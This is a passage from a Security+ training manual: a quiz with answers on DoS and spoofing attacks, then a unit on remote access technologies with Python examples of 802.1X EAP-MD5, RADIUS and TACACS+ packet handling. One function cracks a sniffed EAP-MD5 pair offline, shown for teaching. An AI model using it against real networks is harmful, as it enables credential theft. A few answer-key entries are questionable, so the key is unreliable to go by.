           1 Distributed denial-of-service attacks can involve which of the following? (Choose
             all that apply.)
              A   Zombies
              B Birthday attack
              C   Handlers
              D TFN2K

                    2 Which of the following correctly outlines the normal setup of a TCP session?
                      A ACK, SYN, SYN/ACK
                      B SYN, ACK, RST
                      C    SYN, SYN/ACK, ACK

                      D ACK, RST, SYN/ACK
                    3 Identify each of the following as a DoS tool, backdoor, virus, or Trojan horse:

                          Item            Type

                          CodeRedII         Virus

                          Trin00            Tool

                          BO2K              Backdoor

                          Stacheldracht     Tool

                          Melissa           Virus


                    4 ARP poisoning affects which of the following? (Choose all that apply.)
                      A Hostname-to-IP address resolutions
                      B    IP address-to-MAC address resolutions
                      C Domain name resolution
                      D Authentication requests
                    5 Man-in-the-middle attacks can be accomplished using which of the following?
                      A    ICMP redirects
                      B NetBus
                      C ARP spoofing
                      D Replay attacks
                    6 Denial-of-service (DoS) attacks are a family of attack methods that make target
                      systems unavailable to their legitimate users. True or false?
                      True

                    7 The SYN flood attack exploits the nature of the TCP three-way ______________.
                      Handshake

                    8 What are IP fragmentation attacks and how do they work?
                      These attacks misuse ICMP. These attacks craft a very large IP packet and send it to the victim
                      fragment by fragment. Once the collected fragments exceed the 65,535 byte size limit, the
                      victim’s host crashes.

                    9 Pings are used to establish whether a remote host is reachable. True or false?
                      True

10 A well-known exploit that uses IP Packet fragmentation techniques to crash remote
   systems is called:
    A Spoofing
    B Smurf
    C   Ping of Death

    D ARP poisoning
11 Smurf is a non-OS specific attack that uses the network to amplify its effect on the
   victim. True or false?
    True

12 The best defense against a replay attack is:
    An anti-replay feature that makes each packet unique.

13 To prevent an internal Smurf attack, you should turn off directed broadcasts on all
   internal routers. True or false?
    True

14 Hunt is a free Linux tool that can monitor traffic on an Ethernet segment. True or
   false?
    True

15 What are three strategies for cryptanalysis?
    Ciphertext-only, known plaintext attack, chosen plaintext attack

16 The _____________ attack is used to find collisions of hash functions.
    Birthday

17 A _________________ __________________ is a program that poses as something
   else, causing the user to ‘willingly’ inflict the attack on himself or herself.
    Trojan horse


Unit 4
Remote access

Unit time: 120 minutes

Complete this unit, and you'll know how to:

A Explain the different communications mediums for remote access and issues
  surrounding them.

B Describe the IEEE 802.1X, RADIUS, and TACACS+ authentication systems.

C Describe VPN technology and its tunneling protocols.

D Identify the different vulnerabilities associated with telecommuting.


Topic A: Securing remote communications
Explanation          Networks have become ubiquitous in today’s interconnected world. Access to these
                     networks from remote locations has also boomed. As the trend towards telecommuting
                     grows, so has the risk associated with increased exposure. Open-air networks, equipped
                     with mobile phones, PDAs, and wireless NICs, are vulnerable to snooping and denial of
                     service attacks. Personal firewalls and antivirus scanners provide limited protection as
                     telecommuter’s access e-mail and Internet messaging services over open cable and
                     public telephone lines. Hackers’ tools and how-to manuals abound on the Internet,
                     within easy reach of “script kiddies.”
                     The task of the security specialist is to identify all communications mediums whereby
                     remote users can communicate with their home office, identify their potential
                     vulnerabilities, and then take precautionary measures to safeguard the confidentiality,
                     integrity, and accessibility of data.

                     Communications mediums
                     The communication medium describes the physical connection between the remote
                     computer and your network. These include:
                        • Dial-up connections
                         • Integrated Services Digital Networks (ISDN)
                         • Digital Subscriber Lines (DSL)
                         • Cable modems

                     Dial-up connections
                     Public Switched Telephone Network (PSTN) connections (also called dial-up
                     connections) use analog modems and standard telephone lines to transmit data. They
                     rely on Serial Line Internet Protocol (SLIP) or Point-to-Point Protocol (PPP) to
                     dial up and connect to a remote access server. (PPP is a data link protocol that
                     provides dial-up access over serial lines. It authenticates the caller with PAP,
                     which sends the password in the clear, or the stronger CHAP, which answers a
                     server challenge with a hash of the password so that the password itself never
                     crosses the line. SLIP is an older data link protocol with no authentication of
                     its own and has been largely replaced by PPP.)
                     PSTN connections are the cheapest means of data communications, although lack of a
                     local ISP can run up expensive long-distance bills. Speeds range up to 56 Kbps.
                     From a security standpoint, telephone lines are harder to tap than a shared LAN,
                     but a modem that answers on a published or guessable number is reachable by
                     anyone, which makes it susceptible to war dialing. In this attack the perpetrator
                     dials every number in a block (for example, all numbers in a company’s exchange),
                     records those answered by modems, then redials each in an attempt to break into
                     the computer behind it.

                     ISDN
                     Integrated Services Digital Network (ISDN) is a telecommunications standard for
                     transmitting voice, video, and data over digital lines. Like PSTN, it normally
                     carries PPP to the remote access server (Multilink PPP when the two B channels are
                     bonded), so the same PAP/CHAP considerations apply.
                     ISDN basic service (BRI) uses two 64 Kbps circuit-switched channels, called B
                     (“bearer”) channels, to carry voice and data; they can be combined for 128 Kbps
                     of bandwidth. A separate 16 Kbps D (“delta”) channel carries control signals.

The D channel is used to signal the telephone company computer to make calls, put
them on hold, and activate features such as conference calling and call forwarding. It
also receives information about incoming calls, such as the identity of the caller.
ISDN also offers two high-end services:
    • Primary Rate Interface (PRI) is geared for business customers. The North
      American and Japanese implementation provides 23 64-Kbps B channels and
      one 64 Kbps D channel for control signals. The European implementation
      provides 30 B channels and one D channel.
    • Broadband ISDN (B-ISDN) is geared for enterprise customers. It uses cell
      switching with rates above 155 Mbps to transport data, voice, and video on a
      single circuit.
ISDN is noticeably faster than analog modems but significantly slower than DSL
connections. Unlike DSL, it can be installed in almost any location.

DSL
Digital Subscriber Line (DSL) sends digital transmissions over ordinary copper
telephone lines for high-speed Internet access. DSL technology is available in several
forms, collectively referred to as xDSL. Typical consumer (ADSL) service provides on the
order of 384 Kbps upstream and 1.5 Mbps downstream; the rates are asymmetric because
most traffic flows toward the subscriber.
DSL must be installed within about 5.5 km (18,000 ft.) of the phone company’s access
point, and the faster the connection, the closer the subscriber must be. DSL is more
expensive than analog connectivity options.
One security issue with DSL is that the connection is always on until the system is
switched off or unplugged, and the address rarely changes. A vulnerable host is
therefore exposed continuously and can be found by routine Internet scanning, rather
than only for the duration of a dial-up session.

Cable modem
A cable modem is an external device that allows your computer to connect to the
Internet through a cable TV wire. The cable runs from your neighborhood to a central
location, referred to as the headend, where equipment communicates with all the cable
modems in subscribers’ homes. Cable modems translate radio frequency (RF) signals to and
from the cable plant into Internet Protocol (IP) packets.
For those who can get it in their area, cable modem service has quickly become a
popular high-speed alternative due to competitive costs and very high speeds; however,
there are some drawbacks. Because the neighborhood segment is a shared medium, bandwidth
diminishes as more local users simultaneously access the Internet, and traffic on the
segment is in principle visible to other subscribers unless the cable plant encrypts it
(as DOCSIS Baseline Privacy does). In addition, as with DSL, the connection to the
Internet is always on, so the system is exposed to attack around the clock.

Protecting the network
The solution to securing remote access to a network is twofold:
    • Authenticate users — Authentication mechanisms include IEEE 802.1X, Remote
      Authentication Dial-In User Service (RADIUS), and Terminal Access Controller
      Access Control System Plus (TACACS+).
    • Encrypt data flows — Tunneling and encryption mechanisms include Point-to-Point
      Tunneling Protocol (PPTP), Layer Two Tunneling Protocol (L2TP, which tunnels but
      does not itself encrypt and is normally paired with IPSec), IP Security protocol
      (IPSec), and Secure Shell (SSH).

Do it!              A-1:      Reviewing communications mediums
                      Questions and answers
                       1 Dial-up connections use _________ and _______ protocols to dial up and connect
                         to a remote access server.

                          SLIP, PPP

                       2 What are some of the vulnerabilities of phone lines?

                          They are susceptible to war dialing.

                       3 What are some of the drawbacks to using cable modems?

                          Bandwidth diminishes as more local users simultaneously access the Internet. As the
                          connection to the Internet is always open, the system is vulnerable to attacks by hackers.

                       4 Which ISDN channel is used to carry voice and data?
                          A    Channel A
                          B    Channel B
                          C    Delta channel
                          D    BRI channel

                       5 PPP uses _______ and ________ protocols to authenticate users.
                          A    PAP and CHAP
                          B    PSTN and SLIP
                          C    SLIP and PAP
                          D    DSL and ISDN


Topic B: Authentication
              This topic covers the following CompTIA Security+ exam objective:

               #       Objective

               2.1     Recognize and understand the administration of the following types of remote access
                       technologies
                        • 802.1x
                        • TACACS (Terminal Access Controller Access Control System)
                        • Radius




              Security protocols
Explanation   When a corporation adds remote users to its corporate network, it faces a new range
              of security issues: the users are communicating over an open line, or using remote
              access applications over the Internet. This enables an unauthorized party to
              eavesdrop, or to launch replay and man-in-the-middle attacks against the network.
              Authenticating remote users requires additional security measures to ensure data is
              protected over an unsecured communication medium. First, usernames and passwords
              must never cross the medium in the clear. Second, corporate policies, including
              access control lists, must be enforced at the point of entry. Finally, all remote
              sessions must be logged for auditing purposes.
              The following security protocols provide solutions to these issues:
                     • IEEE 802.1X
                     • Remote Authentication Dial-In User Service (RADIUS)
                     • Terminal Access Controller Access Control System (TACACS+)

              IEEE 802.1X
              Our discussion of the IEEE 802.1X protocol begins with PPP. PPP is a protocol for
              communication between two computers using a serial interface, typically a personal
              computer connected by phone line to a server. Once the connection is established, PPP
              can negotiate an authentication protocol to authenticate the user. The traditional
              authentication method has been either PAP or CHAP, although PAP is not considered
              secure.
              Extensible Authentication Protocol (EAP) extended the capabilities of PPP to
              encompass a range of new authentication methods, including token cards, one-time
              passwords, certificates, and biometrics. It describes standards to ensure compatibility
              and interoperability between the remote user, an access point or switch, and an
              authentication server, such as RADIUS. EAP deals exclusively with the authentication
              process.
              IEEE 802.1X provides a standard for port-based network access control: a switch or
              access point port forwards only authentication traffic until the attached device has
              been authenticated. 802.1X does not define the authentication mechanism itself; it
              carries EAP (as EAPOL frames on the LAN) and leaves the choice of EAP method to the
              deployment.

                  EAP is carried over several transports and offers several methods, with different
                  levels of security and support for wired and wireless LANs:
                      • EAP over LAN (EAPOL), the 802.1X encapsulation between supplicant and
                        authenticator on Ethernet and Wi-Fi
                      • EAP over RADIUS, the usual encapsulation between the authenticator and the
                        authentication server (EAP over IP, EAPoIP, is a less common variant)
                      • EAP-MD5, a CHAP-style challenge/response (EAP-MD5-CHAP); weak, because a
                        sniffed challenge/response pair can be attacked offline and the server is
                        never authenticated, so it is unsuitable for wireless LANs
                      • Transport Layer Security (EAP-TLS), mutual certificate-based authentication
                      • Tunneled Transport Layer Security (EAP-TTLS), in which a server certificate
                        protects a weaker inner method such as a password
                      • Lightweight Extensible Authentication Protocol (LEAP), Cisco proprietary and
                        also known to be vulnerable to offline dictionary attacks

                 IEEE 802.1X conversation
                  Depending on the EAP method in use, the authentication exchange will vary. The
                  following exchange describes a wireless LAN using 802.1X:
                      1 A client (known as the supplicant) tries to connect to a wireless access point
                         (known as the authenticator).
                      2 The access point (authenticator) detects the client and brings its port up in
                         the unauthorized state, so only 802.1X (EAPOL) traffic is forwarded. All
                         other traffic, such as HTTP, DHCP, and POP3 packets, is blocked.
                      3 The supplicant sends an EAPOL-Start message.
                      4 The authenticator sends an EAP-Request/Identity message requesting the user’s
                         identity.
                      5 The supplicant sends the identity (EAP-Response/Identity) to the authenticator.
                      6 The authenticator forwards the identity to the authentication server. The
                         authentication server is usually RADIUS, although 802.1X does not specify it.
                      7 The authentication server authenticates the user, typically through one or
                         more EAP challenge/response round trips relayed by the authenticator. The
                         result is either an accept or a reject.
                      8 The authentication server returns the result to the authenticator, which
                         passes EAP-Success or EAP-Failure on to the supplicant.
                      9 Upon receiving the accept, the authenticator opens the client’s port for
                         other types of traffic.
                      10 At logoff, the client sends an EAPOL-Logoff message. This forces the access
                         point to transition the client port back to the unauthorized state.
                 Exhibit 4-1 uses a RADIUS server as an example.







    Exhibit 4-1: IEEE 802.1X conversation

    For information on the latest developments on IEEE standards, visit the following Web
    site:
       http://www.ieee.org
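    The exchange above, worked through in code. This is an added example written for this
    edition, not code from the IEEE standard, from RFC 3748, or from any product; it models the
    supplicant, authenticator and authentication server in one Python process, using the EAPOL
    and EAP packet layouts from IEEE 802.1X and RFC 3748 with EAP-MD5 as the method. The user
    table, names and passwords are constructed for the demonstration. The last function shows
    why EAP-MD5 is listed as weak: an eavesdropper holding a single challenge/response pair can
    test password guesses offline, and the method never authenticates the server.

```python
import hashlib
import hmac
import os
import struct

# Constants from IEEE 802.1X (EAPOL packet types) and RFC 3748 (EAP codes and types).
EAPOL_EAP_PACKET, EAPOL_START, EAPOL_LOGOFF = 0, 1, 2
EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE = 1, 2, 3, 4
EAP_TYPE_IDENTITY, EAP_TYPE_MD5 = 1, 4


def eapol(ptype, body=b""):
    """EAPOL header: protocol version (1 = 802.1X-2001), packet type, body length."""
    return struct.pack("!BBH", 1, ptype, len(body)) + body


def eap(code, ident, etype=None, data=b""):
    """EAP packet: code, identifier, total length, then optional type and type-data."""
    body = b"" if etype is None else bytes([etype]) + data
    return struct.pack("!BBH", code, ident, 4 + len(body)) + body


def parse_eap(pkt):
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    if length < 4 or length != len(pkt):
        raise ValueError("bad EAP length")
    return code, ident, (pkt[4] if length > 4 else None), pkt[5:]


def md5_response(ident, password, challenge):
    """EAP-MD5 response value, the CHAP construction: MD5(identifier || secret || challenge)."""
    return hashlib.md5(bytes([ident]) + password + challenge).digest()


class AuthServer:
    """Stand-in for the authentication server (usually RADIUS; 802.1X does not mandate it).
    The user table handed to it is constructed for this example."""

    def __init__(self, users):
        self.users, self.pending = users, {}

    def challenge(self, ident, identity):
        c = os.urandom(16)
        self.pending[ident] = (identity, c)
        return eap(EAP_REQUEST, ident, EAP_TYPE_MD5, bytes([len(c)]) + c)

    def check(self, ident, data):
        identity, c = self.pending.pop(ident)
        given = data[1:1 + data[0]]                   # value-size byte, then the digest
        pw = self.users.get(identity)
        ok = pw is not None and hmac.compare_digest(given, md5_response(ident, pw, c))
        return eap(EAP_SUCCESS if ok else EAP_FAILURE, ident)


class Authenticator:
    """The switch or access point port: forwards only EAPOL until EAP-Success arrives."""

    def __init__(self, server):
        self.server, self.authorized = server, False

    def handle(self, frame):
        _, ptype, length = struct.unpack("!BBH", frame[:4])
        body = frame[4:4 + length]
        if ptype == EAPOL_START:                      # steps 3-4: ask who is there
            return eapol(EAPOL_EAP_PACKET, eap(EAP_REQUEST, 1, EAP_TYPE_IDENTITY))
        if ptype == EAPOL_LOGOFF:                     # step 10: back to unauthorized
            self.authorized = False
            return None
        _, ident, etype, data = parse_eap(body)
        if etype == EAP_TYPE_IDENTITY:                # step 6: relay identity to the server
            return eapol(EAPOL_EAP_PACKET, self.server.challenge(ident + 1, data))
        if etype == EAP_TYPE_MD5:                     # steps 7-9: relay the verdict, open port
            result = self.server.check(ident, data)
            self.authorized = parse_eap(result)[0] == EAP_SUCCESS
            return eapol(EAPOL_EAP_PACKET, result)
        raise ValueError("unexpected EAP type %r" % etype)


def run_supplicant(auth, identity, password):
    """Drive one full exchange. Returns (authorized, challenge_id, challenge, response)."""
    reply = auth.handle(eapol(EAPOL_START))
    _, ident, _, _ = parse_eap(reply[4:])
    reply = auth.handle(eapol(EAPOL_EAP_PACKET,
                              eap(EAP_RESPONSE, ident, EAP_TYPE_IDENTITY, identity)))
    _, ident, _, data = parse_eap(reply[4:])
    challenge = data[1:1 + data[0]]
    response = md5_response(ident, password, challenge)
    reply = auth.handle(eapol(EAPOL_EAP_PACKET,
                              eap(EAP_RESPONSE, ident, EAP_TYPE_MD5, bytes([16]) + response)))
    return parse_eap(reply[4:])[0] == EAP_SUCCESS, ident, challenge, response


def crack_md5_challenge(ident, challenge, response, wordlist):
    """Why EAP-MD5 is weak on open media: one sniffed pair is an offline password oracle."""
    for guess in wordlist:
        if md5_response(ident, guess, challenge) == response:
            return guess
    return None


if __name__ == "__main__":
    port = Authenticator(AuthServer({b"alice": b"letmein"}))
    ok, ident, challenge, response = run_supplicant(port, b"alice", b"letmein")
    print("authorized:", ok, port.authorized)
    print("recovered from sniffed pair:",
          crack_md5_challenge(ident, challenge, response, [b"password", b"letmein"]))
```

    Run it and observe that the port’s authorized flag is False until EAP-Success arrives and
    returns to False on EAPOL-Logoff. On a wireless LAN the EAP method must also produce keying
    material to seed link encryption, which EAP-MD5 cannot do; that is why key-generating
    methods such as EAP-TLS or EAP-TTLS are required there.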

Do it!              B-1:      Discussing IEEE 802.1X
                      Questions and answers
                       1 The point of authentication for remote access to a central LAN is usually some
                         type of network access server. True or false?

                          True

                       2 PPP establishes a link between remote systems. True or false?

                          True

                       3 EAP is the acronym for _____________________.
                          A      Extended Authorization Protocol
                          B      Extended Authentication Protocol
                          C      Extensible Authentication Protocol
                          D      Extensible Administrative Protocol

                       4 EAP supports multiple authentication methods including:
                          A      One-time passwords
                          B      Certificates
                          C      Token cards
                          D      Shared keys

                       5 What are the three components in the 802.1X authentication exchange?
                          A      Supplicant, authenticator, authenticating server
                          B      RADIUS client, authenticator, authenticating server
                          C      Supplicant, RADIUS server, authenticating server
                          D      Supplicant, ISP, authenticator

              Remote Authentication Dial-In User Service
Explanation   Remote Authentication Dial-in User Service (RADIUS) provides a centralized system
              for authentication, authorization, and accounting. It is widely deployed in remote access
              networks to authenticate users.
              RADIUS has two components: a RADIUS client, which is typically a network access
              server such as a dial-up server, VPN server, or wireless access point, and a RADIUS
              server. The RADIUS client is usually the device the remote user connects to at the
              network edge; the server sits on the corporate LAN, and the two share a secret that
              is configured on both.
              All user authentication and network service access information is located on the
              RADIUS server. This information is contained in a variety of formats suitable to the
              user’s requirements. RADIUS in its generic form can authenticate users against a UNIX
              password file, Network Information Service (NIS), as well as a separately maintained
              RADIUS database.

              Authentication with a RADIUS server
              The RADIUS client sends authentication requests to the RADIUS server and acts on
              responses sent back by the server. RADIUS authenticates users through a series of
              communications between the client and the server using the User Datagram Protocol
              (UDP). After a user is authenticated, the client provides that user with access to the
              appropriate network services.
                  1 Using any of the remote access methods, the user connects to the RADIUS
                     client, which is also a network access server (NAS). After the connection is
                     established, the RADIUS client prompts the user for a name and password.
                  2 From this information, the RADIUS client creates a data packet called the
                     Access-Request. This packet includes attributes identifying the specific
                     RADIUS client sending the request, the port that is being used for the
                     connection, the username, and the password.
                  3 To protect the password from eavesdroppers, the RADIUS client hides it by
                     XORing it with an MD5 keystream derived from the shared secret and a random
                     16-byte Request Authenticator carried in the packet header. Only the
                     password is hidden; the username and all other attributes travel in the clear.
                  4 The Access-Request is sent over the network (UDP, port 1812; older
                     deployments use 1645) to the RADIUS server.
                  5 When the Access-Request is received, the RADIUS server checks that it came
                     from a known client and recovers the password using its copy of the shared
                     secret. The credentials are then passed to the appropriate back-end security
                     system. This could be a UNIX password file, Kerberos, or even a
                     custom-developed security system.
                  6 If the username and password are correct, the server sends an Access-Accept
                     message that includes attributes describing the user’s network service
                     requirements. For example, the RADIUS server tells the RADIUS client that a
                     user needs PPP or SLIP framing to connect to the network. The reply can even
                     contain filtering information to limit a user’s access to specific resources
                     on the network.
                  7 If, at any point in this logon process, conditions are not met, the RADIUS server
                     sends an Access-Reject to the RADIUS client, and the user is denied access to the
                     network. So that the client does not act on forged replies, every response
                     carries a Response Authenticator: an MD5 hash over the reply, the original
                     Request Authenticator, and the shared secret, which only a server holding the
                     secret can produce.

                      8 After this information is received by the NAS, it enables the necessary
                        configuration to deliver the right network services to the user. This process is
                        shown in Exhibit 4-2.




                  Exhibit 4-2: RADIUS
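                  The packet handling described in steps 2 through 8, as an added worked example.
                  It was written for this edition and is not code from any RADIUS product or from
                  RFC 2865, though it follows that RFC’s packet and attribute layouts. It builds an
                  Access-Request, hides the password with the RFC 2865 method, parses the packet to
                  show that the username is still readable, and verifies the Response Authenticator
                  on the reply. Attribute numbers are the standard ones; the shared secret, user,
                  NAS address and port values are constructed.

```python
import hashlib
import hmac
import os
import struct

# RADIUS packet codes and attribute types from RFC 2865.
ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
USER_NAME, USER_PASSWORD, NAS_IP_ADDRESS, NAS_PORT, FRAMED_PROTOCOL = 1, 2, 4, 5, 7
FRAMED_PPP = 1


def hide_password(password, secret, request_auth):
    """RFC 2865 5.2: pad to 16-byte blocks, XOR each with MD5(secret || previous block),
    where the 'previous block' for the first block is the Request Authenticator."""
    if not 1 <= len(password) <= 128:
        raise ValueError("User-Password must be 1..128 bytes")
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = bytearray(), request_auth
    for i in range(0, len(padded), 16):
        pad = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ b for p, b in zip(padded[i:i + 16], pad))
        out += block
        prev = block
    return bytes(out)


def reveal_password(hidden, secret, request_auth):
    """Inverse of hide_password, as the server does it. Trailing NUL padding is removed,
    so a real password ending in NUL bytes would be truncated (the RFC accepts this)."""
    if not hidden or len(hidden) % 16:
        raise ValueError("hidden password must be a non-empty multiple of 16 bytes")
    out, prev = bytearray(), request_auth
    for i in range(0, len(hidden), 16):
        pad = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ b for c, b in zip(hidden[i:i + 16], pad))
        prev = hidden[i:i + 16]
    return bytes(out).rstrip(b"\x00")


def encode_attrs(attrs):
    """Attributes are TLVs: type (1 byte), length (1 byte, includes header), value (<= 253)."""
    out = bytearray()
    for atype, value in attrs:
        if len(value) > 253:
            raise ValueError("attribute value too long")
        out += bytes([atype, len(value) + 2]) + value
    return bytes(out)


def build_packet(code, ident, authenticator, attrs):
    body = encode_attrs(attrs)
    return struct.pack("!BBH", code, ident, 20 + len(body)) + authenticator + body


def parse_packet(pkt):
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    if length < 20 or length != len(pkt):
        raise ValueError("bad RADIUS length")
    attrs, i = [], 20
    while i < length:
        atype, alen = pkt[i], pkt[i + 1]
        if alen < 2 or i + alen > length:
            raise ValueError("bad attribute length")
        attrs.append((atype, pkt[i + 2:i + alen]))
        i += alen
    return code, ident, pkt[4:20], attrs


def build_access_request(ident, username, password, secret, nas_ip, nas_port):
    """NAS side (steps 2-4): fresh random Request Authenticator, hidden password only."""
    request_auth = os.urandom(16)
    attrs = [
        (USER_NAME, username),                                   # in the clear
        (USER_PASSWORD, hide_password(password, secret, request_auth)),
        (NAS_IP_ADDRESS, bytes(int(o) for o in nas_ip.split("."))),
        (NAS_PORT, struct.pack("!I", nas_port)),
    ]
    return build_packet(ACCESS_REQUEST, ident, request_auth, attrs), request_auth


def response_authenticator(code, ident, request_auth, attrs, secret):
    """RFC 2865 3: MD5(Code || ID || Length || RequestAuth || Attributes || Secret)."""
    body = encode_attrs(attrs)
    header = struct.pack("!BBH", code, ident, 20 + len(body))
    return hashlib.md5(header + request_auth + body + secret).digest()


def build_response(code, ident, request_auth, attrs, secret):
    """Server side (steps 6-7): the 'signature' in the text is the Response Authenticator."""
    auth = response_authenticator(code, ident, request_auth, attrs, secret)
    return build_packet(code, ident, auth, attrs)


def verify_response(pkt, request_auth, secret):
    """NAS side (step 8): accept only a reply keyed with our secret for our request."""
    code, ident, auth, attrs = parse_packet(pkt)
    expected = response_authenticator(code, ident, request_auth, attrs, secret)
    return hmac.compare_digest(auth, expected)
```

                  Two points the text glosses over show up directly: parse_packet returns
                  User-Name readable on the wire, and verify_response fails for a reply built with
                  a different secret or for a reply to a different request. The hiding is an MD5
                  keystream XOR rather than encryption in the modern sense, and an attacker who
                  captures a request and its reply can test shared-secret guesses offline against
                  the Response Authenticator, so keep secrets long and random and prefer RADIUS over
                  TLS (RFC 6614) or an IPSec tunnel between NAS and server.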


                  Benefits
                  The distributed approach to network security provides a number of benefits:
                      • Greater security — The RADIUS client/server architecture allows all security
                        information to be located in a single, central database, instead of scattered
                        around a network in several different devices. A single UNIX system running
                        RADIUS is much easier to secure and manage than several communications
                        servers located throughout a network.
                      • Scalable architecture — RADIUS creates a single, centrally located database of
                        users and available services, a feature particularly important for networks that
                        include large modem banks and more than one remote communications server.
                        The RADIUS server manages the authentication of the user and the access to
                        services from one location. Any device that supports RADIUS can be a
                        RADIUS client, so a remote user can gain access to the same services from any
                        communications server communicating with the RADIUS server.
                      • Open protocols — RADIUS is an open IETF standard (RFC 2865 for authentication
                        and authorization, RFC 2866 for accounting), and server implementations are
                        available in source form, so it can be adapted to work with systems and
                        protocols already in use. This potentially saves tremendous amounts of time
                        by allowing organizations to modify the RADIUS server to fit their network
                        rather than rework their network to incorporate the NAS. RADIUS can be
                        adapted to most security systems on the market and works with any
                        communications device that supports the RADIUS client protocol; most server
                        implementations expose back-end authentication interfaces that let customers
                        plug in the security technology they use.

           • Future enhancements — As new security technology becomes available, the
             customer can take advantage of that security without waiting for added support
             to the NAS. The new technology need only be added to the RADIUS server by
             the customer or an outside resource. RADIUS also uses an extensible
             architecture, which means that as the type and complexity of service the NAS is
             required to deliver increases, RADIUS can be expanded to provide those
             services.

Do it!   B-2:   Authenticating with a RADIUS server
          Questions and answers
          1 The RADIUS client/server architecture allows all security information to be
            located in a single, central database. True or false?

            True

          2 RADIUS supports most communication and security technologies. True or false?

            True

          3 RADIUS is not expandable. True or false?

            False: It is expandable.

          4 Which of the following cannot be used as a RADIUS client?
            A      VPN server
            B      Wireless access point
            C      Network access server
            D      Windows workstation

          5 Which services are provided by RADIUS? (Choose all that apply.)
            A      Authentication
            B      Auditing
            C      Authorization
            D      Tunneling

                     Terminal Access Controller Access Control System
Explanation          The Terminal Access Controller Access Control System Plus (TACACS+) is an
                     authentication, authorization, and accounting (AAA) protocol developed by Cisco
                     Systems to address the need for a scalable authentication solution. It is the
                     third generation of TACACS protocols: the original protocol, TACACS, did not
                     provide accounting functions. It was followed by XTACACS, which separated the
                     functions of authentication, authorization, and accounting. TACACS+ is an
                     entirely new protocol, not compatible with its predecessors; originally Cisco
                     proprietary, it has since been documented by the IETF as RFC 8907.

                     TACACS+ conversation
                     When a user attempts to remotely access a central LAN, the network access server
                     (the TACACS+ client) opens a TCP connection to the TACACS+ server and sends an
                     authentication START request. The server replies asking for the username; the
                     NAS collects it from the user and forwards it, and the server then requests the
                     password. The password is forwarded in the same way and verified against a
                     database by the TACACS+ server. If successful, the authentication portion of the
                     logon process is complete. At this point, the NAS negotiates the user’s
                     authorization settings with the TACACS+ server in a separate exchange. As the
                     session proceeds, the TACACS+ server records the activities of the remote user in
                     an accounting database for future security audits. The process is shown in
                     Exhibit 4-3.




                     Exhibit 4-3: TACACS+

                         Comparing TACACS+ and RADIUS
                         TACACS+ uses TCP (port 49) for its transport, unlike RADIUS, which uses UDP.
                         TCP offers a connection-oriented transmission; because RADIUS uses UDP, it
                         must implement its own retransmit attempts and time-outs to compensate for the
                         connectionless transport. TCP provides a separate acknowledgement that a
                         request has been received within the network, regardless of how loaded or slow
                         the authentication mechanism might be, and gives an immediate indication of a
                         crashed server because acknowledgements stop arriving.
                         While RADIUS hides only the password in the packet passed from client to
                         server, TACACS+ obfuscates the entire body of the packet, including the
                         username, authorized services, and other information. Neither scheme is strong
                         by modern standards: both are MD5 constructions keyed with a static shared
                         secret. RFC 8907 itself describes the TACACS+ mechanism as obfuscation rather
                         than encryption and recommends deploying it only over a network or tunnel
                         (such as IPSec) that provides confidentiality and integrity; RADIUS over TLS
                         (RFC 6614) exists for the same reason.
                         Because RADIUS combines the authentication and authorization packets, it is
                         difficult to separate these functions. TACACS+ separates authentication,
                         authorization, and accounting, which allows for separate solutions: a user can
                         log on using a Kerberos server for authentication and a TACACS+ server for
                         authorization and accounting.
If students are not familiar with the protocols, you can briefly describe them.
                         Another advantage to using TACACS+ is that it offers multiple protocol support
                         while RADIUS does not. Specifically, AppleTalk Remote Access, NetBIOS Frame
                         Protocol Control, Novell Asynchronous Services Interface, and X.25 PAD
                         connections cannot be supported by RADIUS. TACACS+ is able to support all of
                         these protocols.
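                         The “entire body” claim, made concrete. This is an added example written for
                         this edition, not code from Cisco or from RFC 8907, although the 12-byte header
                         layout and the MD5 pseudo-pad follow that RFC. It builds the authentication
                         START packet that opens the conversation described above, obfuscates its body
                         and shows that the username is no longer visible on the wire, in contrast to
                         a RADIUS Access-Request, where only the password is hidden. The key, username,
                         port and remote address are constructed.

```python
import hashlib
import struct

# TACACS+ constants from RFC 8907. Version byte = major (0xC) << 4 | minor (0 by default).
TAC_PLUS_VERSION = (0xC << 4) | 0x0
TAC_PLUS_AUTHEN = 0x01                   # packet type: authentication
TAC_PLUS_UNENCRYPTED_FLAG = 0x01         # body sent in the clear (testing only)
TAC_PLUS_AUTHEN_LOGIN = 0x01             # START action
TAC_PLUS_AUTHEN_TYPE_ASCII = 0x01        # interactive username/password dialogue
TAC_PLUS_AUTHEN_SVC_LOGIN = 0x01
HEADER = struct.Struct("!BBBBII")        # version, type, seq_no, flags, session_id, length


def pseudo_pad(session_id, key, version, seq_no, length):
    """MD5 chain: pad_1 = MD5(session_id||key||version||seq_no),
    pad_n = MD5(session_id||key||version||seq_no||pad_n-1), truncated to the body length."""
    prefix = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    pad, last = b"", b""
    while len(pad) < length:
        last = hashlib.md5(prefix + last).digest()
        pad += last
    return pad[:length]


def obfuscate(body, session_id, key, version, seq_no):
    """XOR the body with the pseudo pad. The same call de-obfuscates."""
    pad = pseudo_pad(session_id, key, version, seq_no, len(body))
    return bytes(b ^ p for b, p in zip(body, pad))


def authen_start_body(user, port, rem_addr, data=b""):
    """Authentication START: action, priv_lvl, authen_type, authen_service,
    four one-byte lengths, then user, port, rem_addr and data fields."""
    for field in (user, port, rem_addr, data):
        if len(field) > 255:
            raise ValueError("field too long for a one-byte length")
    fixed = bytes([TAC_PLUS_AUTHEN_LOGIN, 1, TAC_PLUS_AUTHEN_TYPE_ASCII, TAC_PLUS_AUTHEN_SVC_LOGIN,
                   len(user), len(port), len(rem_addr), len(data)])
    return fixed + user + port + rem_addr + data


def build_packet(body, session_id, key, seq_no=1, ptype=TAC_PLUS_AUTHEN):
    """Client-side framing. An empty key sets the unencrypted flag and sends the body as-is."""
    flags = 0 if key else TAC_PLUS_UNENCRYPTED_FLAG
    hidden = obfuscate(body, session_id, key, TAC_PLUS_VERSION, seq_no) if key else body
    return HEADER.pack(TAC_PLUS_VERSION, ptype, seq_no, flags, session_id, len(hidden)) + hidden


def parse_packet(pkt, key):
    """Server-side: check the length, undo the obfuscation; returns (seq_no, session_id, body)."""
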